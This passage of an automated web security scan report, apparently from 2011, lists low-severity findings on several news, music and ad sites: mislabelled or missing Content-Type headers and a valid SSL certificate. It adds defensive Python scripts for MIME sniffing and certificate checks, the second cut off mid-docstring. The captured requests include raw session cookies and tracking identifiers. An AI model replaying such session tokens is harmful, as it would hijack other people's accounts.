GET /sites/all/themes/clash/favicon.ico HTTP/1.1
Host: www.clashmusic.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5079a7bd09304b581fb1d164353615c5=h78ot6e3amth8f4pu158nlhcb2; _jsuid=5708256774256404140; __utmz=208768448.1304949660.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=208768448.205966012.1304949660.1304949660.1304949660.1; __utmc=208768448; __utmb=208768448.1.10.1304949660; __qca=P0-2063829282-1304949659904

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:03:59 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Mon, 05 Jan 2009 17:25:52 GMT
ETag: "64c4e7-3aee-951de800"
Accept-Ranges: bytes
Content-Length: 15086
Cache-Control: max-age=1209600
Expires: Mon, 23 May 2011 14:03:59 GMT
Vary: User-Agent
Connection: close
Content-Type: text/plain; charset=UTF-8

......00.... ..%..6... .... ......%........ .h....6..(...0...`..... ......$..........................................i...i...i...i...i...i...i...i...i...i...i...i...i...i...i...i...i...i...i...i...i.
...[SNIP]...

25.22. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text. The 22-byte body is the fixed string "Invalid Application ID"; none of the request parameters (the placeholder api_key and app_id values included) is echoed back, so the mislabelled type carries no reflected content for a browser to interpret.

Request

GET /extern/login_status.php?api_key=MY%20APP%20ID&app_id=MY%20APP%20ID&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df16a1716f4%26origin%3Dhttp%253A%252F%252Fwww.floridatoday.com%252Ff6594b49c%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df319039ca%26origin%3Dhttp%253A%252F%252Fwww.floridatoday.com%252Ff6594b49c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1358fe16c%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1efb99044%26origin%3Dhttp%253A%252F%252Fwww.floridatoday.com%252Ff6594b49c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1358fe16c&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df381179ac%26origin%3Dhttp%253A%252F%252Fwww.floridatoday.com%252Ff6594b49c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1358fe16c&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df48d55258%26origin%3Dhttp%253A%252F%252Fwww.floridatoday.com%252Ff6594b49c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1358fe16c&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.112.112
X-Cnection: close
Date: Mon, 09 May 2011 13:59:33 GMT
Content-Length: 22

Invalid Application ID

25.23. http://www.floridatoday.com/odygel/lib/legacy/GDN/UAWidgets/LoggedOut.js

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.floridatoday.com
Path:   /odygel/lib/legacy/GDN/UAWidgets/LoggedOut.js

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript

The response states that it contains script. However, it actually appears to contain HTML. Note that the captured body opens with a JavaScript block comment (/* ... File: LoggedOut.js ...), so the HTML classification is a scanner heuristic misfire rather than evidence that the endpoint serves HTML under a script type.

Request

GET /odygel/lib/legacy/GDN/UAWidgets/LoggedOut.js HTTP/1.1
Host: www.floridatoday.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rsi_segs=D08734_70008|D08734_72078; GCIONSN=AAAAOn52dzoxfnVidDox; GCIONPN=AAAAOn5zZWdtZW50czpEMDg3MzRfNzAwMDh8RDA4NzM0XzcyMDc4

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Mon, 09 Aug 2010 17:30:28 GMT
Accept-Ranges: bytes
ETag: "092ec8ee837cb1:0"
Server: Microsoft-IIS/6.0
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM"
Vary: Accept-Encoding
Date: Mon, 09 May 2011 13:59:45 GMT
Connection: close
Content-Length: 700

/*
******************************************************************************
File: LoggedOut.js
Copyright: Copyright (c) 2008, Gannett Inc. All rights reserved.
*********************
...[SNIP]...

25.24. http://www.nme.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.nme.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.nme.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ServerID=1045; PHPSESSID=29jkomkf8kicpicajt2rkq4nq6; ignite_loggedin=false; browsertype=web; s_cc=true; __utmz=112756251.1304949643.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); rsi_segs=; ipc_nme_core=1304949672; __utma=112756251.356327229.1304949643.1304949643.1304949643.1; __utmb=112756251.2.10.1304949643; __utmc=112756251; __utmv=112756251.|1=Core=Y=1,; ipc_nme_last_visit=9; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Mon, 18 Apr 2011 13:51:13 GMT
ETag: "1c20313-e36-4a131af475640"
Accept-Ranges: bytes
Content-Length: 3638
Content-Type: text/plain
Cache-Control: max-age=829177
Expires: Thu, 19 May 2011 04:26:40 GMT
Date: Mon, 09 May 2011 14:07:03 GMT
Connection: close

..............h...&... ..............(....... ...........@.............................................................................................................................................
...[SNIP]...

26. Content type is not specified
There are 3 instances of this issue:

Issue description

If a web response does not specify a content type, then the browser will usually analyse the response and attempt to determine the MIME type of its content. This can have unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the absence of a content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body. Sending X-Content-Type-Options: nosniff alongside it tells browsers not to second-guess the declared type, which matters most for responses whose body is not static.
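The two checks behind issues 25 and 26 (a declared type that disagrees with the body, and no declared type at all) are easy to reproduce offline. The script below is an added example, not part of the XSS.CX report and not Burp's own logic: it compares the declared Content-Type with a handful of magic-byte signatures the way a sniffing browser would, and also reports whether X-Content-Type-Options: nosniff is present. The sample responses are constructed from headers visible in the report; the bodies are stand-ins, except the 1x1 GIF, which is built to match the 43-byte body in 26.2.

```python
"""Flag HTTP responses whose Content-Type is missing or does not match the body.

Added example (not part of the XSS.CX report, not Burp's code). It reproduces
the two checks the report makes in issues 25 and 26 by comparing the declared
type with a small set of magic-byte signatures, the way a sniffing browser
would. Sample responses are constructed from headers visible in the report;
the bodies are stand-ins except the 1x1 GIF, which matches the 43-byte body
in 26.2.
"""
from typing import Dict, Optional, Tuple

# Magic bytes checked before any text heuristics.
SIGNATURES: Tuple[Tuple[bytes, str], ...] = (
    (b"GIF87a", "image/gif"),
    (b"GIF89a", "image/gif"),
    (b"\x89PNG\r\n\x1a\n", "image/png"),
    (b"\xff\xd8\xff", "image/jpeg"),
    (b"%PDF-", "application/pdf"),
    (b"\x00\x00\x01\x00", "image/x-icon"),  # ICONDIR: reserved=0, type=1 (icon)
)

# Types browsers treat as the same thing; declared types are folded through
# this table before comparison.
EQUIVALENT = {
    "application/x-javascript": "application/javascript",
    "text/javascript": "application/javascript",
    "image/vnd.microsoft.icon": "image/x-icon",
}


def normalise(mime: str) -> str:
    """Strip parameters such as ';charset=utf-8' and fold known aliases."""
    base = mime.split(";", 1)[0].strip().lower()
    return EQUIVALENT.get(base, base)


def sniff(body: bytes) -> str:
    """Guess a MIME type from the body alone (a rough model of browser sniffing)."""
    for magic, mime in SIGNATURES:
        if body.startswith(magic):
            return mime
    head = body.lstrip()[:256].lower()
    if head.startswith((b"<!doctype html", b"<html", b"<head", b"<body", b"<script")):
        return "text/html"
    if head.startswith((b"{", b"[")):
        return "application/json"
    if head.startswith((b"/*", b"//", b"var ", b"function ")):
        return "application/javascript"
    # NUL bytes or many control characters: binary we cannot name, which is
    # what the report calls "unrecognised content".
    controls = sum(1 for c in body[:512] if c < 9 or 13 < c < 32)
    if b"\x00" in body[:512] or controls > 8:
        return "application/octet-stream"
    return "text/plain"


def header(headers: Dict[str, str], name: str) -> Optional[str]:
    """Case-insensitive header lookup."""
    return next((v for k, v in headers.items() if k.lower() == name.lower()), None)


def check(headers: Dict[str, str], body: bytes) -> Tuple[str, str]:
    """Return (verdict, detail); verdict is 'missing', 'mismatch' or 'ok'."""
    declared = header(headers, "Content-Type")
    sniffed = sniff(body)
    if declared is None:
        return "missing", f"no Content-Type header; body sniffs as {sniffed}"
    if normalise(declared) != sniffed:
        return "mismatch", f"declared {declared!r} but body sniffs as {sniffed}"
    return "ok", declared


def nosniff(headers: Dict[str, str]) -> bool:
    """True when the response forbids sniffing with X-Content-Type-Options: nosniff."""
    value = header(headers, "X-Content-Type-Options")
    return value is not None and value.strip().lower() == "nosniff"


# Constructed samples keyed by the report entry they imitate.
TINY_GIF = (b"GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\xff\xff\xff!\xf9\x04"
            b"\x01\x00\x00\x00\x00,\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02D\x01\x00;")
SAMPLES = {
    "25.21 clashmusic favicon.ico": ({"Content-Type": "text/plain; charset=UTF-8"},
                                     b"\x00\x00\x01\x00\x01\x00\x10\x10\x00\x00\x01\x00\x20\x00"),
    "25.22 facebook login_status": ({"Content-Type": "text/html; charset=utf-8"},
                                    b"Invalid Application ID"),
    "25.23 floridatoday LoggedOut.js": ({"Content-Type": "application/x-javascript"},
                                        b"/*\n File: LoggedOut.js\n*/\n"),
    "26.2 pulsemgr /uds/pc": ({"Server": "Apache-Coyote/1.1"}, TINY_GIF),
    "26.3 meebo /cmd/tc": ({"Server": "nginx/0.7.62"},
                           b'{"stat": "ok", "data": {"canopy": {"enabled": false}}}'),
}


def run_all() -> Dict[str, str]:
    """Verdict per sample; differs from the scanner only on 25.23 (see its note)."""
    return {name: check(hdrs, body)[0] for name, (hdrs, body) in SAMPLES.items()}


if __name__ == "__main__":
    for name, (hdrs, body) in SAMPLES.items():
        verdict, detail = check(hdrs, body)
        print(f"{name}: {verdict} ({detail}; nosniff={nosniff(hdrs)})")
```

Run against the samples, the two favicon-style and the Facebook responses come back as mismatches, the pulsemgr and meebo responses as missing, and none of the captured responses carries nosniff. The floridatoday script is classified as JavaScript here because its body opens with a block comment, which is where this classifier and the scanner's heuristic part ways.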


26.1. http://ad.yieldmanager.com/st

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /st

Request

GET /st?ad_type=iframe&ad_size=468x60&section=1384085 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://www.surphace.com/ads/rubicon_orlandosentinel
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=888a2c66-6932-11e0-8830-001b24783b20&_hmacv=1&_salt=4113190855&_keyid=k1&_hmac=2bd08a6ff17f1fdebe5379daa4d53c1f64bef7b8; pv1="b!!!!-!#3yC!,Y+@!$Xwq!1`)_!%bq`!!!!$!?5%!$U=A2!w1K*!%4fo!$k7.!'pCX~~~~~<wYiT=#mS_~!!J<[!,M,<!$LQ^!,+Z*!$%hK~!#1g.)di=:!ZmB)!%mdT!$hK:~~~~~~<xl/w<y-(rM.jTN!!L7_!,M,<!$LQ^!,+Z*!$%hK~!#1g.)di=:!ZmB)!%mdT!$hK:~~~~~~<xl/w<yjn9M.jTN!#mP:!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#mP>!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#mPA!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#mPD!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#mPG!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#mPJ!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#p!r!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<xtrb!!.vL"; ih="b!!!!?!)Tt+!!!!#<wYoD!)`Tm!!!!#<vmX7!)`Tq!!!!#<vmX5!)`U6!!!!#<vmX0!*loT!!!!#<vl)_!,+Z*!!!!$<xl/w!/Iw4!!!!#<wF]1!/U5t!!!!#<xu,P!/YG?!!!!#<xt+b!/_KY!!!!#<vl)T!/h[p!!!!#<vl)[!/iq6!!!!$<vmX=!/iq@!!!!$<vm`!!/iqB!!!!#<vmTN!/iqH!!!!#<vmTH!0eUu!!!!#<y]8.!0ji6!!!!'<xqS_!0ji7!!!!%<xqRm!1EYJ!!!!#<wUv<!1M!9!!!!$<wF]9!1NgF!!!!#<xt,P!1Z!K!!!!#<xt]R!1`)_!!!!#<wYiT!1kC+!!!!%<xqSY!1kC5!!!!#<xqR`!1kC<!!!!#<xqQb!1kDI!!!!#<xqQM"; 
bh="b!!!%/!!!?H!!!!%<wR0_!!*oY!!!!'<ypn'!!-?2!!!!-<ypn'!!-G2!!!!$<w[UB!!-yu!!!!.<vm`$!!.+B!!!!.<vm`%!!.tS!!!!(<ypn'!!0O4!!!!)<y]81!!0O<!!!!/<y]81!!0P,!!!!#<x4hf!!1Mv!!!!$<y45e!!2(j!!!!/<whqI!!4Qs!!!!%<wle3!!=cS!!!!'<yV[r!!?VS!!B1c<xl.o!!J<=!!!!/<y]81!!J<E!!!!/<y]81!!J>I!!!!#<x)TA!!L(^!!!!$<xD>X!!LHY!!!!.<whoV!!L[f!!!!#<wYl+!!ONX!!!!#<wle$!!ObA!!!!(<ypn'!!PL`!!!!$<y461!!RZ(!!!!)<xt,H!!VQ(!!!!#<wYkr!!Zwb!!!!%<ypn'!!`4u!!!!%<y66/!!dNP!!!!%<x+rS!!g5o!!!!'<wsq+!!iV_!!!!%<wsq-!!i[%!!!!#<x4hf!!ita!!!!0<y]81!!q:E!!!!-<y]81!!q<+!!!!.<y]81!!q</!!!!.<y]81!!q<3!!!!.<y]81!!r^4!!!!(<x+rV!!r^5!!!!#<x*ig!!tjQ!!!!(<ypn'!!ucq!!!!/<y]81!!vRm!!!!)<y]81!!vRq!!!!)<y]81!!vRr!!!!)<y]81!!vRw!!!!/<y]81!!vRx!!!!)<y]81!!vRy!!!!)<y]81!!w3l!!!!(<ypn'!!wQ3!!!!(<ypn'!!wQ5!!!!(<ypn'!!wcu!!!!#<xCAG!!wq:!!!!#<xCAF!!xX$!!!!#<x(sS!!xX+!!!!#<x(rt!!y!r!!!!)<y]81!##^t!!!!#<wYoF!#'uj!!!!#<wsgD!#*Xb!!!!#<yMiw!#*Xc!!!!#<xE(*!#+<r!!!!#<wO:5!#+di!!!!#<xYi<!#+dj!!!!#<xYi<!#+dk!!!!#<xYi<!#-B#!!!!#<wsXA!#-H0!!!!#<wleD!#.dO!!!!+<xt,H!#1*C!!!!%<ypn'!#27)!!!!+<x+rW!#2RS!!!!#<x9#3!#2Rn!!!!#<x2wq!#2XY!!!!)<y]8:!#2YX!!!!#<vl)_!#3>J!!!!#<x(U)!#3g6!!!!#<w>/l!#3pS!!!!#<x31-!#3pv!!!!#<wsXA!#44f!!!!)<y]81!#48w!!2s=<xrZD!#4`K!!!!#<x2wq!#5(U!!!!#<x,:<!#5(^!!!!#<x31-!#5(a!!!!#<x3.t!#5[N!!!!#<vl)_!#5kt!!!!#<x)TA!#5nZ!!!!)<y]81!#7.'!!!!)<y]81!#7.:!!!!)<y]81!#7.O!!!!)<y]81!#8>*!!!!#<x2wq!#8Mo!!!!#<wle%!#8tG!!!!#<wsq,!#=-g!!!!#<xi5p!#KjQ!!B1c<xl.o!#Km/!!!!#<xl/o!#L]q!!!!#<w>/s!#MHv!!!!$<w>/n!#MTC!!!!)<y]81!#MTF!!!!)<y]81!#MTH!!!!)<y]81!#MTI!!!!)<y]81!#MTJ!!!!)<y]81!#MTK!!!!#<w>/m!#M]c!!!!)<xt,H!#Mr7!!!!#<w>/l!#N44!!!!#<x2wq!#N45!!!!#<xr]M!#O29!!!!%<ypn'!#O>d!!C`.<xrYg!#SCj!!!!+<xt,H!#SCk!!!!+<xt,H!#SEm!!!!/<y]81!#SF3!!!!/<y]81!#T,d!!!!#<wsXA!#T8R!!!!#<x+I0!#TnE!!!!)<y]81!#UDP!!!!/<y]81!#UZs!!!!#<yjEy!#U_(!!!!*<wleI!#V7#!!!!#<x,:<!#V8a!!!!#<xq_s!#VEP!!!!#<wleE!#VO3!!!!#<xq_q!#Wb^!!C`.<xrYg!#X8Y!!!!#<xr]M!#XI8!!!!#<xL%*!#YCg!!!!#<x2wq!#Z8A!!!!%<ypn'!#ZPp!!!!#<y,`,!#[L>!!!!%<w[UA!#]%`!!!!$<xtBW!#]@s!!!!%<whqH!#]Z!!!!!%<ypn'!#^@9!!!!#
<x2wq!#^bt!!!!%<xr]Q!#^d6!!!!$<xtBW!#`-7!!!!%<ypn'!#`S2!!!!(<ypn'!#`U0!!!!'<ypn'!#`U9!!!!%<ypn'!#a'?!!!!#<w>/m!#a4,!!!!#<y,`,!#a=6!!!!'<ypn'!#a=7!!!!'<ypn'!#a=9!!!!'<ypn'!#a=P!!!!'<ypn'!#aCq!!!!(<w[U@!#aG>!!!!+<xt,H!#ah!!!!!)<y]81!#ai7!!!!)<y]81!#ai?!!!!)<y]81!#b:Z!!!!#<x2wq!#b<_!!!!#<x3.t!#b<`!!!!#<x,:<!#b<a!!!!#<x,:<!#b='!!!!#<x3.t!#b=*!!!!#<x,:<!#b=E!!!!#<x31-!#b=F!!!!#<x3.t!#b@%!!!!#<wsXA!#bGi!!!!#<xr]M!#c-u!!!!-<w*F]!#c8V!!!!%<ypn'!#c8W!!!!%<ypn'!#c8X!!!!%<ypn'!#c8]!!!!%<ypn'!#c?c!!!!)<y]81!#ddE!!!!#<xYi>!#e(g!!!!#<xE(*!#e9?!!!!#<y,`,!#eLS!!!!#<yjEE!#ePa!!!!#<xr]M!#eaO!!!!+<xt,H!#ec)!!!!%<x+rF!#fG)!!!!%<ypn'!#fG+!!!!'<ypn'!#g=!!!!!%<ypn'!#g]5!!!!)<xdAS!#gig!!!!#<xt+`!#gsr!!!!#<x2wq!#h.N!!!!#<yMiw!#k]4!!!!#<x2wq!#l)E!!!!#<y,`,!#mP5!!!!$<w[UB!#mP6!!!!$<w[UB!#ne_!!!!%<ypn'!#ni8!!!!#<x*cS!#p6E!!!!%<wleK!#p6Z!!!!#<wle8!#p7'!!!!#<yMiw!#p]R!!!!#<wsXA!#p]T!!!!#<wsXA!#q),!!!!#<wO:5!#q2T!!!!.<whoV!#q2U!!!!.<whoV!#q9]!!!!#<waw+!#qx3!!!!#<wGkF!#qx4!!!!#<wGk*!#r:A!!!!#<waw,!#r<X!!!!#<x+I@!#rVR!!!!)<y]81!#sAb!!!!$<y46(!#sAc!!!!$<y46(!#sC4!!!!$<y46(!#sax!!!!#<xd-C!#tLy!!!!)<y]81!#tM)!!!!)<y]81!#tn2!!!!)<y]81!#uE=!!!!#<x9#K!#uJY!!!!/<y]81!#uR3!!!!%<ypn'!#ujQ!!!!%<ypn'!#ust!!!!+<xt,H!#usu!!!!+<xt,H!#v,Y!!!!#<x2wq!#v,Z!!!!#<xt>i!#vyX!!!!)<y]81!#w!v!!!!#<wsXA!#wGj!!!!#<wle$!#wGm!!!!#<wle$!#wW9!!!!+<xt,H!#wnK!!!!)<xt,H!#wnM!!!!)<xt,H!#wot!!!!#<xt>i!#xI*!!!!+<xt,H!#xIF!!!!,<y]81!#yM#!!!!+<xt,H!#yX.!!!!9<w*F[!$!8/!!!!#<xl.y!$!:w!!!!#<x2wq!$!:x!!!!#<xr]M!$!>x!!!!*<wjBg!$!_`!!!!#<y,`,!$#3q!!!!(<x+Z1!$#B>!!!!$<ypn'!$#R7!!!!)<y]81!$#S3!!!!#<y,`,!$#WA!!!!+<xt,H!$$K<!!!!$<wleJ!$$L.!!!!#<w[Sh!$$L/!!!!#<w[Sh!$$L0!!!!#<w[Sh!$$LE!!!!#<w[_a!$$LL!!!!$<w[_f!$$R]!!!!#<xl/)!$$j2!!!!#<xKwk!$$p*!!!!#<wUv4!$%,!!!!!+<xt,H!$%,J!!!!#<x2wq!$%SB!!!!+<xt,H!$%Uy!!!!#<w>/l!$%gQ!!!!#<y,`,!$'/1!!!!#<wx=%!$'Z-!!!!)<y]81!$(!P!!!!(<ypn'!$(+N!!!!#<wGkB!$(Gt!!!!,<y]81!$(S9!!!!%<ypn'!$(Tb!!!!#<yQLc!$(V0!!!!%<y*E<!$)>0!!!!#<xqaf!$)DE!!!!#<xr]M!$)DI!!!!#<x2wq!$)GB!!!!(<ypn'!$*R!!!!!%<xr]Q!$*a0!!!!'<xt,H!$*bX!!!!#<xr]Q
!$*hf!!!!%<ypn'"; BX=8khj7j56qmjsh&b=4&s=dk&t=106

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:00:04 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Mon, 09 May 2011 14:00:04 GMT
Pragma: no-cache
Content-Length: 4552
Age: 0
Proxy-Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=
...[SNIP]...

26.2. http://pcm1.map.pulsemgr.com/uds/pc

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pcm1.map.pulsemgr.com
Path:   /uds/pc

Request

GET /uds/pc?ptnr=21272&sig=7f55db33fbb1aeb3132ef7151d50c9d9 HTTP/1.1
Host: pcm1.map.pulsemgr.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 43
Date: Mon, 09 May 2011 14:00:03 GMT

GIF89a.............!.......,...........D..;

26.3. http://www.meebo.com/cmd/tc

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.meebo.com
Path:   /cmd/tc

Request

POST /cmd/tc HTTP/1.1
Host: www.meebo.com
Proxy-Connection: keep-alive
Referer: http://www.meebo.com/cim/sandbox.php?lang=en&version=v92_cim_11_8_0&protocol=http%3A&network=gannett%3Afloridatoday
Cache-Control: max-age=0
Origin: http://www.meebo.com
If-Modified-Since: Wed Dec 31 1969 18:00:00 GMT-0600 (Central Standard Time)
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bcookie=7c2126d393b99323557e; tcookie=299d841e219be7e7276c%26true%26ic22%3D1%26ic19%3D1%26ic17%3D1%26ic16%3D1%26ic12%3D1%26ac17%3D1%26ac16%3D1%26ac14%3D1%26ac12%3D1%26ac10%3D1%26pc1%3D1%26pc4%3D1%26ic9%3D1%26ac5%3D1%26ic3%3D1%26ic1%3D1%26ac8%3D1%26ic5%3D1; meebo-cim-session=2700844b1a232e5d2007
Content-Length: 59

tcookie=299d841e219be7e7276c&partner=gannett%3Afloridatoday

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 09 May 2011 14:00:45 GMT
Connection: keep-alive
Content-Length: 107

{"stat": "ok", "data": {"tcookie": "299d841e219be7e7276c", "canopy": {"enabled": false}, "categories": {}}}

27. SSL certificate

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.ccnow.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.ccnow.com
Issued by:  Equifax Secure Certificate Authority
Valid from:  Mon Jun 02 16:46:17 CDT 2008
Valid to:  Wed Aug 01 16:46:17 CDT 2012

Certificate chain #1

Issued to:  Equifax Secure Certificate Authority
Issued by:  Equifax Secure Certificate Authority
Valid from:  Sat Aug 22 11:41:51 CDT 1998
Valid to:  Wed Aug 22 11:41:51 CDT 2018

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.
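The three conditions in the background text (name valid for the hostname, issued by a trusted authority, valid on the current date) can be walked through against the chain printed in issue 27. The script below is an added example, not part of the report: the subject, issuer and validity dates are transcribed from the two certificates above (CDT taken as UTC-5), while the trust store is an assumption standing in for a 2011 browser root store. It deliberately does not verify signatures or revocation; a production check must go through the TLS library (ssl.create_default_context in Python), which does both.

```python
"""Evaluate a server certificate against the three conditions the report lists:
name valid for the hostname, issued by a trusted authority, valid on the date.

Added example, not from the report. Subject, issuer and validity dates are
transcribed from issue 27 (CDT taken as UTC-5); the trust store is an
assumption standing in for a 2011 browser root store. Signatures and
revocation are not checked here; a production check must go through the TLS
library (ssl.create_default_context in Python), which does both.
"""
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone
from typing import List, Set

CDT = timezone(timedelta(hours=-5))


@dataclass(frozen=True)
class Cert:
    subject: str      # subject common name (subjectAltName is not modelled)
    issuer: str
    not_before: datetime
    not_after: datetime


def hostname_matches(pattern: str, host: str) -> bool:
    """RFC 6125 style: exact match, or a wildcard that is the whole leftmost
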